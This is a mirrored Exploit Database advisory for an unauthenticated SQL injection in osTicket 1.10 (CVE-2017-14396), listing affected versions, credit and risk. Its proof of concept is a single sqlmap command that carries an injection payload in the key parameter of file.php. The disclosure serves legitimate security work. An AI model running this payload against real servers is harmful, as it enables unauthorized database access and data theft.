osTicket 1.10 – SQL Injection (PoC)

• Exploit Database
• 43 阅读

• 作者： Mehmet Ince
  日期： 2017-09-12
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/42660/

• 1. ADVISORY INFORMATION
  ========================================
  Title: osTicket v1.10 Unauthenticated SQL Injection
  Application: osTicket
  Bugs:SQL Injection
  Class: Sensitive Information disclosure
  Remotely Exploitable: Yes
  Authentication Required: NO
  Versions Affected: <= v1.10
  Technology: PHP
  Vendor URL: http://osticket.com/
  CVSSv3 Score: 10.0 (/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H)
  Date of found: 12 Sep 2017
  Author: Mehmet Ince
  Advisory:
  Advisory | osTicket v1.10 Unauthenticated SQL Injection (CVE-2017-14396 )
  
  
  2. CREDIT
  ========================================
  This vulnerability was identified during penetration test
  by Mehmet INCE from PRODAFT / INVICTUS
  
  3. VERSIONS AFFECTED
  ========================================
  osTicket < 1.10
  
  5. Technical Details & POC
  ========================================
  Please visit an advisory URL for technical details.
  
  PoC code:
  python sqlmap.py -u "
  http://target/file.php?key[id%60%3D1*%23]=1&signature=1&expires=15104725311" --dbms MySQL
  
  6. RISK
  ========================================
  The vulnerability allows remote attackers to execute a sql query on
  database system.
  
  7. REFERENCES
  ========================================
  Advisory | osTicket v1.10 Unauthenticated SQL Injection (CVE-2017-14396 )